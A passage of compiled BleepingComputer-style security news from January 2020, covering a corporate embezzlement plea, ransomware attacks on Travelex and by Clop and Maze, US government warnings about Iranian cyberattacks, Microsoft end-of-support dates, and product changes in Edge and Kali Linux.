He was arrested on September 4, 2019, at which time he was also charged with an additional count transacting in criminally derived property that carried out an extra maximum sentence of 10 years.

"As he admitted today, Hicham Kabbaj defrauded the company for which he worked by arranging for payment of fraudulent invoices to a shell company he created," said Manhattan U.S. Attorney Geoffrey S. Berman.

52 invoices worth millions
While the complaint unsealed on September 5, 2019, doesn't say what was the company he defrauded, a Hicham Kabbaj moved up through the ranks at integrated marketing solutions firm Rakuten Marketing as found by analyst K. Louise Neufeld and according to his LinkedIn page.

He started as Director of Operations in May 2015 and was employed as a Tech Ops & Engineering SVP between May 2018 and Aug 2019.

Being in charge of the company's data centers allowed him to start his embezzlement scheme by sending himself invoices just four months after being hired, asking for payment for firewall devices, servers, and services that were never delivered.

More exactly, between August 2015 through April 2019, Kabbaj's Interactive Systems shell company submitted to his employer roughly 52 invoices.

From in or about August 2015 through in or about April 2019, Interactive Systems submitted to Company-1 approximately 52 invoices. Four of these invoices were submitted in Word document format, and the metadata for these four invoices identified KABBAJ as the author. Each invoice from Interactive Systems was addressed to KABBAJ.

Besides all invoices being addressed to Kabbaj, the special agent assigned to the investigation also discovered that four invoices were also submitted in Word document format with the metadata identifying Kabbaj as the author.

"As part of the scheme, KABBAJ caused Interactive Systems to send invoices to Company-1 claiming that Interactive Systems performed services and purchased firewalls and servers for Company-1," a Department of Justice press release published today says.

"In reality, Interactive Systems did none of that work, and KABBAJ quickly transferred the money that Company-1 paid to Interactive Systems to his own personal bank accounts.

In total, KABBAJ defrauded Company-1 of more than $6 million as a result of the scheme," the DoJ adds.

From in or about December 2016 through in or about July 2019, the only withdrawals from the Interactive Systems account, other than maintenance fees, are transfers to two accounts at Bank-1 held in the name of KABBAJ ("Kabbaj Account-1" and "Kabbaj Account-2"). There are no withdrawals to pay other vendors or individuals for goods or services, such as the purchase of firewall devices or servers.

Besides, pleading guilty to one count of wire fraud for which he is facing a maximum sentence of 20 years in prison, Kabbaj also "agreed to forfeit his homes in Palm Beach Gardens, Florida, and Hewitt, New Jersey, as property traceable to the offense, among other assets, and he has agreed to pay restitution in the amount of $6,051,453."

"Today, Mr. Kabbaj pled guilty to a serious felony because he chose to misuse his position of trust as a corporate executive to steal company funds for his own personal gain," IRS-CI Special Agent in Charge Jonathan D. Larsen added.

"As a result of the dedicated work of IRS-CI special agents, along with our partners at the U.S. Attorney’s Office, Mr. Kabbaj will face the consequences of his crime when he is sentenced by a federal judge."


Sodinokibi Ransomware Hits Travelex, Demands $3 Million
10.1.2020 
Bleepingcomputer  Ransomware

It's been more than six days since a cyber attack took down the services of the international foreign currency exchange company Travelex and BleepingComputer was able to confirm that the company systems were infected with Sodinokibi ransomware.

The attack occurred on December 31 and affected some Travelex services. This prompted the company to take offline all its computer systems, a precaution meant "to protect data and prevent the spread of the virus."

As a result, customers could no longer use the website or the app for transactions or make payments using credit or debit cards at its more than 1,500 stores across the world. Hundreds of customer complaints came pouring in via social media since the outage began.

In replies to customers today, Travelex was unable to provide updates about progress on restoring its services. In the meantime, the company shows a cyber incident notification on the main page of its website and "planned maintenance" on other pages.

All network locked, files stolen
On January 3, ComputerWeekly magazine received inside information that the London-based foreign currency exchange company fell victim to a ransomware attack, albeit the malware family remained unknown.

The same news outlet today reported that the ransomware used in the Travelex attack is Sodinokibi.

BleepingComputer was able to independently confirm that Travelex systems were indeed infected by REvil ransomware. We were told that the extension added to some of the encrypted files was a string of more than five random characters, similar to .u3i7y74. This malware typically adds different extensions to files locked on other computer systems.

In addition to the ransom note, the Sodinokibi crew told BleepingComputer that they encrypted the entire Travelex network and copied more than 5GB of personal data, which includes dates of birth, social security numbers, card information and other details.

We were told that they deleted the backup files and that the ransom demanded was $3 million; if not paid in seven days (countdown likely started on December 31), the attackers said they will publish the data they stole.

Travelex left the door open
Details about how the intrusion occurred are not available at the moment but Travelex was running insecure services before the incident, which could explain how the attacker may have breached the network.

The company is using the Pulse Secure VPN enterprise solution for secure communication, which was patched last year against an "incredibly bad" vulnerability (CVE-2019-11510), as security researcher Kevin Beaumont describes it in a recent blog post.

On unpatched systems, the flaw "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," Beaumont explains.

A public exploit for this has been available since August 21, 2019. Soon after, someone started scanning the internet for vulnerable endpoints.

Troy Mursch, chief research officer at Bad Packets, found about 15,000 systems that were directly exploitable via this security issue. Mursch then started to contact organizations at risk, warning them about the danger of leaving their systems unpatched.

Travelex was one of the companies Mursch alerted of the issue but he did not get a reply:

source: Bad Packets Report
Attackers typically spend significant time on the network before deploying the ransomware and encrypting files. This is to get familiar with the network and find systems with important data and backups, to increase their chances of getting paid.

Furthermore, Kevin Beaumont discovered that Travelex had on its Amazon cloud platform Windows servers that were exposed to the internet and did not have the Network Level Authentication feature enables. This means that anyone could connect to the server before authenticating.

source: Kevin Beaumont
Update [06/01/2020, 18:26 EST]: Pulse Secure issued a statement today about ransomware actors exploiting unpatched VPN servers. The company is not validating any recent findings as it does not have any data about the attacks.

"As of now, we are unaware of receiving reports directly from customers about this derivative exploit – no firsthand evidence," Pulse Secure told BleepingComputer.

The current communication underlines that a patch for the software is available since April 24, 2019, and that customers were informed multiple times about the fix, via emails, in-product and support website notifications.

"Actors will take advantage of the vulnerability that was reported on Pulse Secure, Fortinet and Palo Alto VPN products – and in this case, exploit unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers." Scott Gordon (CISSP), Pulse Secure Chief Marketing Officer.

Since the release of the patch, support engineers have been available 24x7 for customers needing help to solve the problem, including those not under an active maintenance contract.


US Govt Says Iran's Cyberattacks Can Disrupt Critical Infrastructure
10.1.2020 
Bleepingcomputer  BigBrothers

The U.S. Department of Homeland Security (DHS) warned in a terrorism threat alert issued through the National Terrorism Advisory System (NTAS) that potential cyberattacks carried out by Iranian-backed actors against the U.S. have the potential to disrupt critical infrastructure.

The NTAS bulletin was issued to describe the current threat landscape following a lethal strike carried out against and killing the Iranian IRGC-Quds Force commander Maj. Gen. Qassim Suleimani on January 2, 2020, at the Baghdad airport in Iraq.

While DHS' NTAS alert says that there is "no information indicating a specific, credible threat to the Homeland" at this time, the DHS also adds that "an attack in the homeland may come with little or no warning."

"Iran and its partners, such as Hizballah, have demonstrated the intent and capability to conduct operations in the United States," with previous such efforts having "included, among other things, scouting and planning against infrastructure targets and cyber-enabled attacks against a range of U.S.-based targets."

The new @DHSgov NTAS Bulletin on the threat landscape was issued to inform & reassure the American public, state/local governments & private partners that DHS is actively monitoring & preparing for any specific, credible threat, should one arise. pic.twitter.com/iNnHU1TI9A

— Acting Secretary Chad Wolf (@DHS_Wolf) January 4, 2020
"In times of heightened threats, organizations should increase monitoring, back up systems, implement multifactor authentication, & have an incident response plan ready," Acting Secretary Chad F. Wolf advises.

U.S. critical infrastructure is a target
"Iran maintains a robust cyber program and can execute cyberattacks against the United States," DHS's NTAS alert says.

"Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States."

While the NTAS alert doesn't mention what sectors could be targeted in such future attacks, the DHS website lists the following 16 critical infrastructure sectors as vital to the United States:

• Chemical Sector
• Commercial Facilities Sector
• Communications Sector
• Critical Manufacturing Sector
• Dams Sector
• Defense Industrial Base Sector
• Emergency Services Sector
• Energy Sector
• Financial Services Sector
• Food and Agriculture Sector
• Government Facilities Sector
• Healthcare and Public Health Sector
• Information Technology Sector
• Nuclear Reactors, Materials, and Waste Sector
• Transportation Systems Sector
• Water and Wastewater Systems Sector
As the DHS says, incapacitating or destroying targets from these infrastructure sectors "would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."

"Iran has shown previously to be opportunistic in its targeting of infrastructure with denial of service attacks against banks as well as trying to get access to industrial control systems in electric and water companies," Robert M. Lee, Dragos CEO and Founder said.

"While it is important to think where strategic targets would be for them it's just as relevant that they might search for those who are more insecure to be able to have an effect instead of a better effect on a harder target."

CISA warns of a potential wave of Iranian cyber-attacks
While Acting Secretary Wolf said in a statement that "at this time there is no specific, credible threat against the homeland," Christopher C. Krebs, Director of Cybersecurity and Infrastructure Security Agency, issued a warning about the possibility of Iranian cyber-attacks targeting U.S. assets.

"Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS," Krebs said. "Make sure you’re also watching third party accesses!"

CISA also alerted the public and private sector in June 2019 of an increase in Iranian-backed malicious cyber activity employing destructive wiper tools and targeting U.S. industries and government agencies.

Read my statement on Iranian cybersecurity threats below. pic.twitter.com/qh7Zp9DBMY

— Chris Krebs (@CISAKrebs) June 22, 2019
According to Krebs' statement published in June 2019 on Iranian cybersecurity threats, these attacks were being conducted utilizing common tactics such as credential stuffing, password spraying, and spear phishing.

"What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network," CISA's Director said at the time.

"Iran has leveraged wiper malware in destructive attacks on several occasions in recent years," John Hultquist, FireEye Director of Intelligence Analysis also adds. "Though, for the most part, these incidents did not affect the most sensitive industrial control systems, they did result in serious disruptions to operations."


How to Stop Microsoft From Testing New Features in Edge
10.1.2020 
Bleepingcomputer  OS

The Chromium-based Edge will launch later this month and Microsoft has started sharing essential information about the browser, including how to disable various features in your environment.

Microsoft says the new Edge will be pushed via Windows Update to supported versions of Windows 10 and it replaces the existing Edge as the default web browser.

When installed, Microsoft plans to use 'Experimentation and Configuration Service (ECS)' in Edge to request and receive different kinds of configurations, feature rollouts, and experiments.

In other words, Experimentation and Configuration Service (ECS) allows Microsoft to turn on and test experimental Edge's features, improvements and bug fixes without a user's knowledge or permission.

While ECS experiments aim to improve the browsing experience, they can also create problems for enterprises and administrators.

For example, in November Google used a similar concept to enable an experimental WebContent Occlusion feature that caused the browser to show a white screen for enterprise users. The experimental feature was rolled back after furious admins complained.

If you want to be on a safer side, you can disable Microsoft Edge's communication with the experiment service by installing the Microsoft Edge group policies.

Disable A/B testing service in Microsoft Edge
Download and install the Microsoft Edge Policy file from the Microsoft Edge Enterprise site.
Once installed, open the Group Policy Editor via Start menu or search.
In Group Policy Editor, under Computer Configuration, right-click on Administrative Templates and select Add/Remove Templates.
When the Add/Remote Templates window appears, click on Add and navigate to the C:\Windows\PolicyDefinitions\en-US folder and select msedge.adm as shown below. Then click on the Open button.
Add Microsoft Edge Template
Add Microsoft Edge Template
Close the Add/Remove Templates window.
Now go to Computer Configuration -> Administrative Templates -> Classic Administrative Templates and then click on Microsoft Edge.
Look through the list of policies and double-click on the Control communication with the experimentation and configuration service option.
You can then select one of the following three configurations depending on what you wish to do — Retrieve configurations only, Retrieve configurations and experiments, and Disable communication with the service. Descriptions of what each setting does can be found here.
Configure Policy
Configure Policy
Once you select the option you wish to use, you can close the Group Policy Editor and the policy will be configured.
Microsoft warns that disabling the communication with this service could affect the company's ability to patch bugs in the Edge browser.


BusKill Cable Starts a Self-Destruct Routine on Stolen Laptops
10.1.2020 
Bleepingcomputer  Safety

A USB cable and some scripting can save sensitive data on your laptop from grab-and-go thieving situations when working in a public place.

Linux system administrator and software engineer Michael Altfield designed a kill-cord called BusKill that can trigger a specific action when it gets disconnected from the laptop.

He came up with the idea after searching for a simple, low-tech solution to cause the computer to lock, shut down, or self-destruct when it is physically separated from the owner.

In essence, BusKill is a cable with a USB drive at one end that attaches to your body and your laptop at the other. When the drive disconnects, it acts on a predefined 'udev' event, which can be anything from locking the computer, shutting it down, or wipe data on it.

Altfield spent about $20 to build BusKill but this depends on the quality of the items you choose. A USB drive, a magnetic adapter, a carabiner, and a USB extension cable are the hardware essentials.

source: Michael Altfield
Nothing needs to be stored on the USB storage since only its presence is required for the kill cable to do its job; so it can be a cheap device as long as the system recognizes it.

A script that triggers the action is the software part. It can spring into action only when a specific drive is removed by adding uniquely identifiable properties (manufacturer, filesystem UUID, model).

Below is a video showing BusKill in action:

The scenarios Altfield envisages for using BusKill involve working on your laptop in a public space and being logged into services that offer access to sensitive information, like online banking or the company VPN connection.

Altfield argues that despite taking precautions like two-factor authentication, VPN, or password managers, someone that steals your laptop after having authenticated is a plausible risk that some individuals should consider.

BusKill is not available for sale but Altfield provides all the details needed to build your own.

The project sparked a rich discussion on Reddit about how the scenarios thought by Altfield are not at all far fetched and do happen in real life.

The community also came up with other solutions that would protect the data on the laptop. More elaborate ones could destroy the encrypted files on the storage drive when a specific password was entered and boot normally into the operating system.

Following these discussions, the Linux sysadmin is now thinking of writing a follow-up tutorial on expanding the BusKill capabilities to run a destructive wipe of the content in the computer memory and the LUKS (Linux Unified Key Setup) header instead of the entire encrypted disk.

This approach would make the process faster and more effective because the LUKS header contains the symmetric keys required for decrypting the entire disk. "Wiping the whole drive is unnecessary and would take too long," Altfield told BleepingComputer.


Kali Linux to Default to Non-Root User With 2020.1 Release
10.1.2020 
Bleepingcomputer  OS

The Kali Linux distribution is going to switch to a new security model by defaulting to a non-root user starting with the upcoming 2020.1 release.

This change will come with the release of the 2020.1 version scheduled for late January 2020, but users can already test it via the daily builds.

They will also be able to test it by downloading and running the weekly images released until Kali 2020.1 will be officially available.

"New year is a good time for major changes, and in that spirit we would like to announce a major change in the Kali security model releasing in the upcoming 2020.1 release - Default Non-Root User," the Kali Linux team announced on Twitter.

Increased usage as primary OS, fewer tools requiring root
This move has been prompted by the increasing number of users that adopted Kali as a day to day operating system due to the Debian-Testing-based operating system's general stability.

"While we don’t encourage people to run Kali as their day to day operating system, over the last few years more and more users have started to do so (even if they are not using it to do penetration testing full time), including some members of the Kali development team," Kali team lead Jim O’Gorman said.

"When people do so, they obviously don’t run as default root user. With this usage over time, there is the obvious conclusion that default root user is no longer necessary and Kali will be better off moving to a more traditional security model."

Additionally, Kali's dev team based this move on the fact that over the years a lot of the security tools included with the distro no longer need root access to provide users with full access to all their features, with some of them even going as far as coming with defaults that prevented their use as the root user.

"Dropping this default root policy will thus simplify maintenance of Kali and will avoid problems for end-users," O’Gorman added.

These are some of the changes end users will notice after the non-root user will be implemented:

• Kali in live mode will be running as user kali password kali. No more root/toor. (Get ready to set up your IDS filters, as we are sure this user/pass combo will be being scanned for by bots everywhere soon).
• On install, Kali will prompt you to create a non-root user that will have administrative privileges (due to its addition to the sudo group). This is the same process as other Linux distros you may be familiar with.
• Tools that we identify as needing root access, as well as common administrative functions such as starting/stopping services, will interactively ask for administrative privileges (at least when started from the Kali menu). If you really don’t care about security, and if you prefer the old model, you can install kali-grant-root and run dpkg-reconfigure kali-grant-root to configure password-less root rights.
"All that said, we are still not encouraging people to use Kali as their day to day operating system," O’Gorman further explains. "More than anything else, this is because we don’t test for that usage pattern and we don’t want the influx of bug reports that would come with it.

However, for those of you that are familiar with Kali and want to run it as your day to day platform, this change should help you out a lot. For the rest of you, this should give you a better security model to operate under while you are doing assessments."

Windows 10 undercover mode
Kali Linux also added an 'Undercover' mode with the release of 2019.4 during late November 2019 that can be used to instantly make the Kali desktop look almost identical to a Windows 10 one.

This works by enabling a custom Kali theme designed to look like a Windows 10 one to the casual view or someone looking at your desktop in passing.

"Say you are working in a public place, hacking away, and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing. So, we made a little script that will change your Kali theme to look like a default Windows installation," Kali's devs said.

"That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme."

To enable the Undercover mode in Kali Linux 2019.4, you should perform these steps:

Open Terminal
Type kali-undercover and press enter.
Undercover mode will be activated and your desktop will now look similar to Windows. You can now close the Terminal window.
Once you're done with the Undercover mode, you have to run the kali-undercover script again to switch back to your normal Kali theme.

The kali-undercover script can also be run using Kali's desktop search as shown in the GIF embedded above.


Linux Gamers Banned in Battlefield V if Using Wine and DXVK
10.1.2020 
Bleepingcomputer  IT

Linux users who are running Battlefield V under Wine with DXVK are being permanently banned from Electronic Art's Battlefield V because the anti-cheat system is mistakenly detecting them as cheating.

Wine is an application that allows users to run Windows programs directly in Linux. To better run 3D games, users can install the DXVK package, which will create new Direct3D DLLs that utilize the Vulkan graphics API to render games in Wine.

According to a forum post at Lutris.net, Linux users are reporting that Electronic Art's anti-cheat system for Battlefield V is detecting these DLLs as a game modification and triggering an automatic and permanent ban on their accounts.

"Good friends, finally after some time without being able to play Battlefield V for Linux, this week I was using lutris-4.21, I was having fun when my anti-cheat, FairFight, blew me out of the game, so I was banned. As I was not using any cheating, I think the anti-cheat considered dxvk or the table layer that used at the time as cheating, I sent an email to EA, is the alert."

When users contacted EA to explain that they were not cheating but rather using Linux with the DXVK package, they were told that the ban was "actioned correctly" and that they would not be removing the ban.

Response to banned users support request
Response to banned users support request
In particular, EA cited the following rules as being broken.

"Promote, encourage or take part in any activity involving hacking, cracking, phishing, taking advantage of exploits or cheats and/or distribution of counterfeit software and/or virtual currency/items"

The DXVK project page does state that using the DXVK Direct3D DLLs in multi-player games could be seen by anti-cheat systems as cheating and that users should use the DLLs at their own risk.

"Manipulation of Direct3D libraries in multi-player games may be considered cheating and can get your account banned. This may also apply to single-player games with an embedded or dedicated multiplayer portion. Use at your own risk."

Ultimately, these users were not trying to cheat, but simply play Battlefield V in the gaming environment of their choice with their paid-for license of the game.

Depriving users of their choice of gaming environments is a short-sighted decision by any game developer, especially as more people continue to move to Linux desktop environments.

BleepingComputer has reached out to Electronic Arts to see if they will resolve this issue, but have not heard back at this time.


Clop Ransomware Now Kills Windows 10 Apps and 3rd Party Tools
6.1.2020 
Bleepingcomputer  Ransomware

The Clop Ransomware continues to evolve with a new and integrated process killer that targets some interesting processes belonging to Windows 10 apps, text editors, programming IDEs and languages, and office applications.

When the Clop Ransomware started circulating in February 2019, it was just your normal garden variety CryptoMix ransomware variant with the same features we have been seeing in this family since 2017.

In March 2019, though, the Clop Ransomware suddenly changed and began disabling services for Microsoft Exchange, Microsoft SQL Server, MySQL, BackupExec, and other enterprise software. The ransom note had also changed to indicate that the attackers were targeting an entire network rather than individual PCs.

Clop Ransom Note
Clop Ransom Note
It was determined at that time, that a threat actor group known as TA505 had adopted the Clop Ransomware as their final payload of choice after compromising a network, similar to how Ryuk, BitPaymer, and DoppelPaymer were being used.

This adoption by the threat actors has most likely fueled the ransomware's development as the actors change it to fit their needs when performing network-wide encryption.

Development continued in November 2019, when a new variant was released that attempted to disable Windows Defender running on local computers so that it would not be detected by future signature updates.

These changes also coincided with the threat actors continued targeting of companies in the Netherlands and France.

Just last month, Maastricht University (UM) in the Netherlands was infected by the Clop Ransomware.

Clop now terminates 663 processes
In late December 2019 a new Clop variant was discovered by MalwareHunterTeam and reverse engineered by Vitali Kremez that add improves their process termination feature; Clop now terminates 663 Windows processes before encrypting files.

It is not uncommon for ransomware to terminate processes before encrypting files as the attackers want to disable security software and do not want any files to be open as it could prevent them from being encrypted.

This new variant takes it a step further by terminating a total of 663 processes, which include new Windows 10 apps, popular text editors, debuggers, programming languages, terminal programs, and programming IDE software.

Some of the more interesting processes that are terminated include the Android Debug Bridge, Notepad++, Everything, Tomcat, SnagIt, Bash, Visual Studio, Microsoft Office applications, programming languages such as Python and Ruby, the SecureCRT terminal application, the Windows calculator, and even the new Windows 10 Your Phone app.

ACROBAT.EXE
ADB.EXE
CODE.EXE
CALCULATOR.EXE
CREATIVE CLOUD.EXE
ECLIPSE.EXE
EVERYTHING.EXE
JENKINS.EXE
MEMCACHED.EXE
MICROSOFTEDGE.EXE
NOTEPAD++.EXE
POWERPNT.EXE
PYTHON.EXE
QEMU-GA.EXE
RUBY.EXE
SECURECRT.EXE
SKYPEAPP.EXE
SNAGIT32.EXE
TOMCAT7.EXE
UEDIT32.EXE
WINRAR.EXE
WINWORD.EXE
YOURPHONE.EXE
It is not known why some of these processes are terminated, especially ones like Calculator, Snagit, and SecureCRT, but its possible they want to encrypt configuration files used by some of these tools.

A full list of the terminated processes can be found in Kremez's GitHub repository.

In the past, the process termination functionality was performed by a Windows batch file. By embedding this functionality into the main executable, it further signifies active development by the group.

"This change signifies that the ransomware group decided to include the "process killer" in the main bot making it a more universal Swiss-army approach rather than relying on their external libraries like "av_block" for this purpose," Kremez told BleepingComputer in a conversation.

In addition to the new and large list of targeted processes, this Clop Ransomware variant also utilizes a new .Cl0p extension, rather than the .CIop or .Clop extensions used in previous versions.

As Clop continues to infect organizations, and reap large ransoms for doing so, we can expect to see its development to continue as the actors evolve their tactics.


Microsoft Products Reaching End of Life in 2020
6.1.2020 
Bleepingcomputer  IT

Several major Microsoft products will reach their end of support during 2020, with Office 2010, Visual Studio 2010, Windows 7, Windows Server 2008 (including 2008R2), and multiple Windows 10 versions including 1803 and 1903 being some of the most important ones.

For products that have reached their end of support, Microsoft stops providing bug fixes for issues that are discovered, security fixes for newly found vulnerabilities, or technical support.

Customers who still use end of service software are advised by Redmond to upgrade as soon as possible to the latest on-premise or cloud version to keep their systems secure and bug-free.

The Extended Security Update program
However, as Microsoft says on its support website, "For customers requiring more time to move to the latest product, the Extended Security Update (ESU) program is available for certain legacy products as a last resort option.

The ESU program provides security updates only for up to 3 years, after the End of Support date. Contact your account manager, partner or device manufacturer for more information."

A list of some of the most prominent Microsoft software products reaching end of support this year and links to more details for each of them is available in the table below:

Product End of Support date
SQL Server 2008 and 2008 R2* 07/09/19
Windows Server 2008 and 2008 R2* 01/14/20
Exchange Server 2010
Windows 7*
Windows 7 Professional for Embedded Systems*
Office 2010 client 10/13/20
SharePoint Server 2010
Project Server 2010
Windows Embedded Standard 7*
The products marked with asterisks are eligible for Microsoft's Extended Security Update Program.

End of support Modern Policy and Fixed Policy products
"Modern Lifecycle Policy covers products and services that are serviced and supported continuously" according to Redmond's support site with the company providing a minimum of 12 months' notification before ending support if no replacement product or service is available.

These are the most important products covered by a Modern Lifecycle Policy that will be retired in 2020.

Products (Modern Policy) Retirement
Azure Container Service
Windows Analytics

January 31, 2020
Windows 10, version 1709 (Enterprise, Education, IoT Enterprise)
Windows 10, version 1809 (Home, Pro, Pro for Workstation, IoT Core)
Windows Server version 1809 (Datacenter Core, Standard Core)

April 14, 2020

Windows 10, version 1803 (Enterprise, Education, IoT Enterprise)

November 10, 2020

Windows 10, version 1903 (Enterprise, Home, Pro, Pro for Workstations, IoT Enterprise)
Windows Server, version 1903 (Datacenter, Standard, IoT Enterprise)

December 8, 2020
According to Microsoft, a very long list of products governed by the company's Fixed Policy will also reach their end of support in 2020.

"Fixed Lifecycle Policy applies to many products currently available through retail purchase or volume licensing," says Microsoft.

This policy provides customers with at least 10 years of support (a minimum of 5 years of Mainstream Support followed by 5 years of Extended Support), with some exceptions.

Below, you can find a list of some of the most significant Microsoft products with a Fixed Policy reaching end of life this year.

Product (Fixed Policy) End of Support
Hyper-V Server 2008
Hyper-V Server 2008 R2
Windows 7
Windows Server 2008 R2
Windows Server 2008

January 14, 2020

Internet Explorer 10 January 31, 2020
Visual Studio Team Foundation Server 2010
Visual Studio 2010 (all editions)

July 14, 2020

System Center Service Manager 2010

September 8, 2020

Access 2010
Excel 2010
Excel Home and Student 2010
Office 2010 (all editions)
Project Server 2010
SharePoint Foundation 2010
SharePoint Server 2010
SharePoint Server 2010 Service Pack 2
System Center Data Protection Manager 2010
Word 2010
Office Home & Business 2016 for Mac
Office Home & Student 2016 for Mac
Office Standard 2016 for Mac

October 13, 2020

Products moving to Extended Support
Besides the long list of products being retired, there are also many of them that will move to Extended Support from Mainstream Support in 2020.

"Extended Support lasts for a minimum of 5 years and includes security updates at no cost, and paid non-security updates and support," says Microsoft.

"Additionally, Microsoft will not accept requests for design changes or new features during the Extended Support phase."

A list of some of the more important software products moving into Extended Support is available in the table embedded below.

Product End of Mainstream Support
Cloud Platform System

April 14, 2020

Exchange Server 2010 (all editions)
Exchange Server 2016 (Enterprise, Standard)
Office Home and Business 2016
Office Home and Student 2016
Office Professional 2016
Office Professional Plus 2016
Office Standard 2016
Skype for Business 2016
Visio Professional 2016
Visio Standard 2016
Visual Studio 2015 (all editions)
Visual Studio 2015 Update 3
Windows 10 Enterprise 2015 LTSB
Windows 10 IoT Enterprise 2015 LTSB
Windows Defender Antivirus for Windows 10
Windows Defender Exploit Guard

October 13, 2020
Microsoft provides a full list of all the products that will be reaching the end of support or will be retiring in 2020, as well as a list of all products and their lifecycle policy timelines in the Lifecycle Product Database.

A complete list of end of support deadlines and related migration information for all Microsoft products is available on the Search product lifecycle page.


FBI Warns of Maze Ransomware Focusing on U.S. Companies
6.1.2020 
Bleepingcomputer  BigBrothers  Ransomware

Organizations in the private sector received an alert from the F.B.I. about operators of the Maze ransomware focusing on companies in the U.S. to encrypt information on their systems after stealing it first.

The warning came less than a week after the Bureau warned about the LockerGoga and MegaCortex ransomware threats infecting corporate systems.

The many tricks of Maze ransomware
On December 23, the F.B.I. shared with private businesses a Flash Alert seen by BleepingComputer to increase awareness about Maze ransomware's increased targeting of institutions in the U.S.

The warning is marked TLP: Green, meaning that it is not shareable via public distribution channels, and contains technical details to help organizations avoid falling victim to this threat.

Maze has been operating since early 2019 at a global level but the "FBI first observed Maze ransomware activity against US victims in November 2019."

Following a network breach, the threat actor first exfiltrates, or steals, company files before encrypting computers and network shares. The actors then demand a victim-specific ransom in exchange for the decryption key.

The stolen data serves as leverage to force victims to pay the ransom, under the promise that it would be destroyed once the attackers get the money.

Maze operators in the past have released data from victims that did not pay them. Two recent examples are the City of Pensacola and Southwire, a manufacturer of cables and wires.

According to the F.B.I. alert, the threat actors behind Maze ransomware use several methods to breach a network, which include fake cryptocurrency sites and malspam campaigns that impersonate government agencies and security vendors.

The malware was also seen distributed by exploit kits like Fallout in May 2019, and Spelevo in October 2019 exploiting unpatched vulnerabilities in Internet Explorer and Adobe Flash (CVE-2018-8174, CVE-2018-15982, and CVE-2018-4878).

"As of late November 2019, malicious cyber actors posing as government agencies or security vendors deployed Maze through phishing emails containing a macro-enabled Word document attachment. When the embedded macro was executed, Maze was downloaded and executed to infect the victim machine" - Federal Bureau of Investigation

The F.B.I. does not recommend paying the ransom since this action does not guarantee the recovery of the encrypted files or the destruction of the stolen data; it would only encourage the threat actors to attack other organizations.

FBI wants the IoCs from victims
Providing indicators of compromise (IoCs) from cyber attacks as soon as possible can help law enforcement in ongoing investigations. The name of the victim is not required in such cases but time is of essence; IoCs should be reported as soon as possible because their value in the investigation decreases at a fast rate.

The agency encourages victims to contact local field offices immediately after the discovery of a ransomware incident and provide the following information:

Recovered executable file
Copies of the file or other documents suspected to be related to Maze
Complete phishing email file with headers
Live memory (RAM) capture
Images of infected systems
Malware samples
Network and Host-Based Log files
Email addresses of the attackers
A copy of the ransom note
Ransom amount and whether or not the ransom was paid
Bitcoin wallets used by the attackers
Bitcoin wallets used to pay the ransom (if applicable)
Tor sites used to contact the attackers
Names of any other malware identified on your system
Copies of any communications with attackers
Document use of the domains used for communication
Identification of website or forum where data was leaked
Recommended mitigations
Organizations can lower the chances of falling victim to a ransomware attack by working with up-to-date software, using multi-factor authentication and strong passwords, and by separating the more important systems from the wider access network.

Furthermore, recovering from ransomware is easier and less expensive when a proper routing exists for creating backups offline and the integrity of the process is constantly under scrutiny.

If the attack already happened, the F.B.I. recommends the following mitigation steps:

Execute a network-wide password reset
Scan system backups for registry persistence
Scan system backups for other malware infections, particularly IcedID banking Trojan, Trickbot, and/or Emotet
Audit logs for unexpected network traffic and mitigate as needed


U.S. Government Issues Warning About Possible Iranian Cyberattacks
6.1.2020 
Bleepingcomputer  BigBrothers

Christopher C. Krebs, Director of Cybersecurity and Infrastructure Security Agency issued a warning about a potential new wave of Iranian cyber-attacks targeting U.S. assets after Maj. Gen. Qassim Suleimani was killed by a U.S. airstrike at the Baghdad airport in Iraq.

"Given recent developments, re-upping our statement from the summer," Krebs said in a rare warning on Twitter.

"Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS," he added. "Make sure you’re also watching third party accesses!"

"The Department of Homeland Security stands ready to confront and combat any and all threats facing our homeland," Acting Secretary Chad F. Wolf also said today in a statement.

"While there are currently no specific, credible threats against our homeland, DHS continues to monitor the situation and work with our Federal, State and local partners to ensure the safety of every American."

Given recent developments, re-upping our statement from the summer.

Bottom line: time to brush up on Iranian TTPs and pay close attention to your critical systems, particularly ICS. Make sure you’re also watching third party accesses! https://t.co/4G1P0WvjhS

— Chris Krebs (@CISAKrebs) January 3, 2020
Statement on June 2019 data wiper attacks
CISA also warned in June 2019 of an increase in cyberattacks utilizing destructive wiper tools targeting U.S. industries and government agencies by Iranian actors or proxies.

According to Krebs' June statement on Iranian cybersecurity threats also published on Twitter, these attacks were conducted using common tactics such as credential stuffing, spear phishing, and password spraying.

"What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network," CISA's Director said.

While Krebs' statement did not point to any specific attack, previous attacks that utilized wiper malware show the amount of damage they can lead to:

In 2012, Shamoon was used as a political protest against Saudi Arabia, leading to the destruction of data on more than 30,000 computers.
In 2017, the NotPetya wiper used the EternalBlue exploit to infect vulnerable systems.
Again in 2017, another anti-Israel & pro-Palestinian data wiper dubbed IsraBye pretended to be ransomware.
In 2018, a hacker group attempted to hack Banco de Chile's systems to obtain the bank’s access credentials for the SWIFT network. They deployed the KillDisk wiper in the attack to destroy data and takedown roughly 9,000 computers and 500 servers. This allowed them to mislead security teams while they got away with around $10 million.
Also in 2018, yet another wiper called Olympic Destroyer was used to attack the Pyeongchang 2018 Winter Olympics' computer systems.
Tonight’s elimination of Qasem Soleimani might bring some retaliation from Iran, specially from the Revolutionary Guard. As a reminder here are a few cyber operations previously conducted by Iran: Shamoon, Ababil, SamSam and many others. Watch your logs. pic.twitter.com/A2x9MqmtLM

— Omri Segev Moyal (@GelosSnake) January 3, 2020
Krebs suggested the following CISA bulletins to those who want to learn more about how to effectively protect against such attacks:

Brute Force Attacks Conducted by Cyber Actors
Avoiding Social Engineering and Phishing Attacks
